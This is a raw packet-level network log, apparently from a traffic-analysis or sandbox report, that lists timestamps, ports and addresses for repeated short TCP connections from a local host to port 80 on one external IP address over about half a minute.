                      Jun 28, 2024 21:17:54.149991989 CEST4985680192.168.2.477.91.77.82
                      Jun 28, 2024 21:17:54.150013924 CEST804985577.91.77.82192.168.2.4
                      Jun 28, 2024 21:17:54.150129080 CEST4985580192.168.2.477.91.77.82
                      Jun 28, 2024 21:17:54.150269032 CEST4985680192.168.2.477.91.77.82
                      Jun 28, 2024 21:17:54.155030012 CEST804985677.91.77.82192.168.2.4
                      Jun 28, 2024 21:17:54.903615952 CEST804985677.91.77.82192.168.2.4
                      Jun 28, 2024 21:17:54.903775930 CEST4985680192.168.2.477.91.77.82
                      Jun 28, 2024 21:17:55.116091013 CEST4985680192.168.2.477.91.77.82
                      Jun 28, 2024 21:17:55.120388985 CEST4985780192.168.2.477.91.77.82
                      Jun 28, 2024 21:17:55.121483088 CEST804985677.91.77.82192.168.2.4
                      Jun 28, 2024 21:17:55.121566057 CEST4985680192.168.2.477.91.77.82
                      Jun 28, 2024 21:17:55.125320911 CEST804985777.91.77.82192.168.2.4
                      Jun 28, 2024 21:17:55.127501965 CEST4985780192.168.2.477.91.77.82
                      Jun 28, 2024 21:17:55.138588905 CEST4985780192.168.2.477.91.77.82
                      Jun 28, 2024 21:17:55.144382954 CEST804985777.91.77.82192.168.2.4
                      Jun 28, 2024 21:17:55.923649073 CEST804985777.91.77.82192.168.2.4
                      Jun 28, 2024 21:17:55.923713923 CEST4985780192.168.2.477.91.77.82
                      Jun 28, 2024 21:17:55.927377939 CEST4985780192.168.2.477.91.77.82
                      Jun 28, 2024 21:17:55.927753925 CEST4985880192.168.2.477.91.77.82
                      Jun 28, 2024 21:17:55.932543993 CEST804985877.91.77.82192.168.2.4
                      Jun 28, 2024 21:17:55.932610035 CEST4985880192.168.2.477.91.77.82
                      Jun 28, 2024 21:17:55.932749033 CEST4985880192.168.2.477.91.77.82
                      Jun 28, 2024 21:17:55.933149099 CEST804985777.91.77.82192.168.2.4
                      Jun 28, 2024 21:17:55.933198929 CEST4985780192.168.2.477.91.77.82
                      Jun 28, 2024 21:17:55.938007116 CEST804985877.91.77.82192.168.2.4
                      Jun 28, 2024 21:17:56.685010910 CEST804985877.91.77.82192.168.2.4
                      Jun 28, 2024 21:17:56.685153961 CEST4985880192.168.2.477.91.77.82
                      Jun 28, 2024 21:17:56.800044060 CEST4985980192.168.2.477.91.77.82
                      Jun 28, 2024 21:17:56.800108910 CEST4985880192.168.2.477.91.77.82
                      Jun 28, 2024 21:17:56.805582047 CEST804985977.91.77.82192.168.2.4
                      Jun 28, 2024 21:17:56.805707932 CEST4985980192.168.2.477.91.77.82
                      Jun 28, 2024 21:17:56.805891037 CEST4985980192.168.2.477.91.77.82
                      Jun 28, 2024 21:17:56.806468964 CEST804985877.91.77.82192.168.2.4
                      Jun 28, 2024 21:17:56.809509039 CEST4985880192.168.2.477.91.77.82
                      Jun 28, 2024 21:17:56.810823917 CEST804985977.91.77.82192.168.2.4
                      Jun 28, 2024 21:17:57.531723022 CEST804985977.91.77.82192.168.2.4
                      Jun 28, 2024 21:17:57.533490896 CEST4985980192.168.2.477.91.77.82
                      Jun 28, 2024 21:17:57.596318960 CEST4985980192.168.2.477.91.77.82
                      Jun 28, 2024 21:17:57.596894026 CEST4986080192.168.2.477.91.77.82
                      Jun 28, 2024 21:17:57.601429939 CEST804985977.91.77.82192.168.2.4
                      Jun 28, 2024 21:17:57.601735115 CEST804986077.91.77.82192.168.2.4
                      Jun 28, 2024 21:17:57.601788998 CEST4985980192.168.2.477.91.77.82
                      Jun 28, 2024 21:17:57.601897955 CEST4986080192.168.2.477.91.77.82
                      Jun 28, 2024 21:17:57.602402925 CEST4986080192.168.2.477.91.77.82
                      Jun 28, 2024 21:17:57.607191086 CEST804986077.91.77.82192.168.2.4
                      Jun 28, 2024 21:17:58.311515093 CEST804986077.91.77.82192.168.2.4
                      Jun 28, 2024 21:17:58.311610937 CEST4986080192.168.2.477.91.77.82
                      Jun 28, 2024 21:17:58.426378965 CEST4986080192.168.2.477.91.77.82
                      Jun 28, 2024 21:17:58.426740885 CEST4986180192.168.2.477.91.77.82
                      Jun 28, 2024 21:17:58.434654951 CEST804986177.91.77.82192.168.2.4
                      Jun 28, 2024 21:17:58.434726954 CEST4986180192.168.2.477.91.77.82
                      Jun 28, 2024 21:17:58.435015917 CEST4986180192.168.2.477.91.77.82
                      Jun 28, 2024 21:17:58.435291052 CEST804986077.91.77.82192.168.2.4
                      Jun 28, 2024 21:17:58.435333967 CEST4986080192.168.2.477.91.77.82
                      Jun 28, 2024 21:17:58.439810038 CEST804986177.91.77.82192.168.2.4
                      Jun 28, 2024 21:17:59.131618977 CEST804986177.91.77.82192.168.2.4
                      Jun 28, 2024 21:17:59.131735086 CEST4986180192.168.2.477.91.77.82
                      Jun 28, 2024 21:17:59.134854078 CEST4986180192.168.2.477.91.77.82
                      Jun 28, 2024 21:17:59.134854078 CEST4986280192.168.2.477.91.77.82
                      Jun 28, 2024 21:17:59.139750957 CEST804986277.91.77.82192.168.2.4
                      Jun 28, 2024 21:17:59.139878035 CEST4986280192.168.2.477.91.77.82
                      Jun 28, 2024 21:17:59.139991045 CEST4986280192.168.2.477.91.77.82
                      Jun 28, 2024 21:17:59.140095949 CEST804986177.91.77.82192.168.2.4
                      Jun 28, 2024 21:17:59.140321970 CEST4986180192.168.2.477.91.77.82
                      Jun 28, 2024 21:17:59.144764900 CEST804986277.91.77.82192.168.2.4
                      Jun 28, 2024 21:17:59.838681936 CEST804986277.91.77.82192.168.2.4
                      Jun 28, 2024 21:17:59.838737011 CEST4986280192.168.2.477.91.77.82
                      Jun 28, 2024 21:17:59.956084013 CEST4986280192.168.2.477.91.77.82
                      Jun 28, 2024 21:17:59.956518888 CEST4986380192.168.2.477.91.77.82
                      Jun 28, 2024 21:17:59.961347103 CEST804986377.91.77.82192.168.2.4
                      Jun 28, 2024 21:17:59.961409092 CEST4986380192.168.2.477.91.77.82
                      Jun 28, 2024 21:17:59.961466074 CEST804986277.91.77.82192.168.2.4
                      Jun 28, 2024 21:17:59.961509943 CEST4986280192.168.2.477.91.77.82
                      Jun 28, 2024 21:17:59.961623907 CEST4986380192.168.2.477.91.77.82
                      Jun 28, 2024 21:17:59.966392040 CEST804986377.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:00.648771048 CEST804986377.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:00.648876905 CEST4986380192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:00.654706955 CEST4986380192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:00.655354023 CEST4986480192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:00.659830093 CEST804986377.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:00.659881115 CEST4986380192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:00.660128117 CEST804986477.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:00.660197973 CEST4986480192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:00.660785913 CEST4986480192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:00.665640116 CEST804986477.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:01.423053026 CEST804986477.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:01.425477028 CEST4986480192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:01.558217049 CEST4986580192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:01.558260918 CEST4986480192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:01.563056946 CEST804986577.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:01.563245058 CEST4986580192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:01.563409090 CEST804986477.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:01.563519955 CEST4986480192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:01.563683987 CEST4986580192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:01.568425894 CEST804986577.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:02.294905901 CEST804986577.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:02.294965029 CEST4986580192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:02.300421953 CEST4986580192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:02.300889015 CEST4986680192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:02.306281090 CEST804986677.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:02.306339979 CEST4986680192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:02.306555033 CEST4986680192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:02.306981087 CEST804986577.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:02.307025909 CEST4986580192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:02.311254025 CEST804986677.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:03.049221039 CEST804986677.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:03.049367905 CEST4986680192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:03.158704996 CEST4986680192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:03.159034967 CEST4986780192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:03.163861036 CEST804986677.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:03.163881063 CEST804986777.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:03.164042950 CEST4986780192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:03.164043903 CEST4986680192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:03.165491104 CEST4986780192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:03.170265913 CEST804986777.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:04.062906027 CEST804986777.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:04.062993050 CEST4986780192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:04.063276052 CEST804986777.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:04.063347101 CEST4986780192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:04.066029072 CEST4986780192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:04.066323042 CEST4986880192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:04.071197987 CEST804986877.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:04.071257114 CEST4986880192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:04.071309090 CEST804986777.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:04.071362019 CEST4986780192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:04.071541071 CEST4986880192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:04.076368093 CEST804986877.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:04.788988113 CEST804986877.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:04.789067984 CEST4986880192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:04.892930984 CEST4986880192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:04.893335104 CEST4986980192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:04.898261070 CEST804986977.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:04.898344994 CEST4986980192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:04.898509026 CEST4986980192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:04.902715921 CEST804986877.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:04.902770042 CEST4986880192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:04.903208017 CEST804986977.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:05.588094950 CEST804986977.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:05.588170052 CEST4986980192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:05.590946913 CEST4986980192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:05.591301918 CEST4987080192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:05.596137047 CEST804986977.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:05.596191883 CEST804987077.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:05.596210003 CEST4986980192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:05.596251011 CEST4987080192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:05.596513033 CEST4987080192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:05.601269007 CEST804987077.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:06.322978020 CEST804987077.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:06.323035002 CEST4987080192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:06.440264940 CEST4987080192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:06.440604925 CEST4987180192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:06.445429087 CEST804987177.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:06.445489883 CEST4987180192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:06.445523024 CEST804987077.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:06.445563078 CEST4987080192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:06.445760012 CEST4987180192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:06.450500011 CEST804987177.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:07.271879911 CEST804987177.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:07.272089005 CEST4987180192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:07.274842978 CEST4987180192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:07.274847984 CEST4987280192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:07.279700041 CEST804987277.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:07.279927015 CEST4987280192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:07.279988050 CEST804987177.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:07.280077934 CEST4987180192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:07.280213118 CEST4987280192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:07.284930944 CEST804987277.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:08.120235920 CEST804987277.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:08.120325089 CEST4987280192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:08.237565041 CEST4987280192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:08.237904072 CEST4987380192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:08.242940903 CEST804987277.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:08.242999077 CEST4987280192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:08.243029118 CEST804987377.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:08.243102074 CEST4987380192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:08.243278980 CEST4987380192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:08.248043060 CEST804987377.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:08.942192078 CEST804987377.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:08.942270041 CEST4987380192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:08.945019007 CEST4987380192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:08.945343018 CEST4987480192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:08.950246096 CEST804987477.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:08.950370073 CEST4987480192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:08.950442076 CEST804987377.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:08.950514078 CEST4987380192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:08.950690985 CEST4987480192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:08.956077099 CEST804987477.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:09.659024000 CEST804987477.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:09.659143925 CEST4987480192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:09.771413088 CEST4987480192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:09.771775961 CEST4987580192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:09.776753902 CEST804987577.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:09.776815891 CEST804987477.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:09.776829958 CEST4987580192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:09.776853085 CEST4987480192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:09.777074099 CEST4987580192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:09.782397985 CEST804987577.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:10.473086119 CEST804987577.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:10.473150015 CEST4987580192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:10.479959965 CEST4987580192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:10.480618000 CEST4987680192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:10.485281944 CEST804987577.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:10.485354900 CEST4987580192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:10.485532999 CEST804987677.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:10.485599041 CEST4987680192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:10.486197948 CEST4987680192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:10.492461920 CEST804987677.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:11.184743881 CEST804987677.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:11.184990883 CEST4987680192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:11.299154043 CEST4987680192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:11.299158096 CEST4987780192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:11.304121971 CEST804987777.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:11.305082083 CEST804987677.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:11.305450916 CEST4987680192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:11.305460930 CEST4987780192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:11.305674076 CEST4987780192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:11.310781956 CEST804987777.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:12.051891088 CEST804987777.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:12.051956892 CEST4987780192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:12.055422068 CEST4987780192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:12.055895090 CEST4987880192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:12.060777903 CEST804987777.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:12.060791016 CEST804987877.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:12.060830116 CEST4987780192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:12.060873985 CEST4987880192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:12.061134100 CEST4987880192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:12.066391945 CEST804987877.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:12.788053989 CEST804987877.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:12.788528919 CEST4987880192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:12.899297953 CEST4987980192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:12.899300098 CEST4987880192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:12.904211044 CEST804987977.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:12.904578924 CEST804987877.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:12.907746077 CEST4987880192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:12.907746077 CEST4987980192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:12.908052921 CEST4987980192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:12.912823915 CEST804987977.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:13.613042116 CEST804987977.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:13.613518000 CEST4987980192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:13.616363049 CEST4988080192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:13.616369963 CEST4987980192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:13.621316910 CEST804988077.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:13.621529102 CEST4988080192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:13.621573925 CEST804987977.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:13.621675968 CEST4988080192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:13.621798992 CEST4987980192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:13.626637936 CEST804988077.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:14.327178001 CEST804988077.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:14.327301979 CEST4988080192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:14.440789938 CEST4988080192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:14.441205025 CEST4988180192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:14.445975065 CEST804988077.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:14.446006060 CEST804988177.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:14.446024895 CEST4988080192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:14.446085930 CEST4988180192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:14.446329117 CEST4988180192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:14.451096058 CEST804988177.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:15.153497934 CEST804988177.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:15.153676033 CEST4988180192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:15.157351017 CEST4988180192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:15.157351017 CEST4988280192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:15.162242889 CEST804988277.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:15.162353992 CEST4988280192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:15.162564039 CEST4988280192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:15.162621975 CEST804988177.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:15.162739038 CEST4988180192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:15.167913914 CEST804988277.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:15.853296041 CEST804988277.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:15.853357077 CEST4988280192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:15.972928047 CEST4988280192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:15.973261118 CEST4988380192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:15.978072882 CEST804988377.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:15.978147030 CEST4988380192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:15.978595972 CEST4988380192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:15.983400106 CEST804988377.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:15.990211010 CEST804988277.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:15.990276098 CEST4988280192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:16.691988945 CEST804988377.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:16.692060947 CEST4988380192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:16.695717096 CEST4988380192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:16.696160078 CEST4988480192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:16.701009989 CEST804988377.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:16.701077938 CEST804988477.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:16.701149940 CEST4988480192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:16.701206923 CEST4988380192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:16.701327085 CEST4988480192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:16.706115961 CEST804988477.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:17.446074009 CEST804988477.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:17.446420908 CEST4988480192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:17.565237045 CEST4988480192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:17.565236092 CEST4988580192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:17.570173025 CEST804988577.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:17.570554018 CEST804988477.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:17.570660114 CEST4988480192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:17.570663929 CEST4988580192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:17.570921898 CEST4988580192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:17.575675011 CEST804988577.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:18.316577911 CEST804988577.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:18.316637039 CEST4988580192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:18.320322990 CEST4988580192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:18.320872068 CEST4988680192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:18.325444937 CEST804988577.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:18.325503111 CEST4988580192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:18.325622082 CEST804988677.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:18.325754881 CEST4988680192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:18.325999975 CEST4988680192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:18.330775976 CEST804988677.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:19.149528980 CEST804988677.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:19.149610043 CEST4988680192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:19.268423080 CEST4988680192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:19.268867016 CEST4988780192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:19.273772955 CEST804988777.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:19.273916960 CEST4988780192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:19.274079084 CEST804988677.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:19.274177074 CEST4988680192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:19.274396896 CEST4988780192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:19.279835939 CEST804988777.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:19.996706009 CEST804988777.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:19.996766090 CEST4988780192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:20.000761032 CEST4988780192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:20.001174927 CEST4988880192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:20.011640072 CEST804988877.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:20.011784077 CEST4988880192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:20.011970997 CEST4988880192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:20.011971951 CEST804988777.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:20.012027025 CEST4988780192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:20.016695023 CEST804988877.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:20.703551054 CEST804988877.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:20.703628063 CEST4988880192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:20.815134048 CEST4988980192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:20.815148115 CEST4988880192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:20.820255995 CEST804988977.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:20.820835114 CEST804988877.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:20.820956945 CEST4988980192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:20.820986032 CEST4988880192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:20.821218967 CEST4988980192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:20.826010942 CEST804988977.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:21.518748999 CEST804988977.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:21.522294044 CEST4988980192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:21.583873987 CEST4988980192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:21.584709883 CEST4989080192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:21.589216948 CEST804988977.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:21.589384079 CEST4988980192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:21.589534998 CEST804989077.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:21.593452930 CEST4989080192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:21.597384930 CEST4989080192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:21.602178097 CEST804989077.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:22.314107895 CEST804989077.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:22.314168930 CEST4989080192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:22.424894094 CEST4989080192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:22.425312042 CEST4989180192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:22.430141926 CEST804989077.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:22.430157900 CEST804989177.91.77.82192.168.2.4
                      Jun 28, 2024 21:18:22.430191040 CEST4989080192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:22.430279016 CEST4989180192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:22.430392027 CEST4989180192.168.2.477.91.77.82
                      Jun 28, 2024 21:18:22.435168028 CEST804989177.91.77.82192.168.2.4
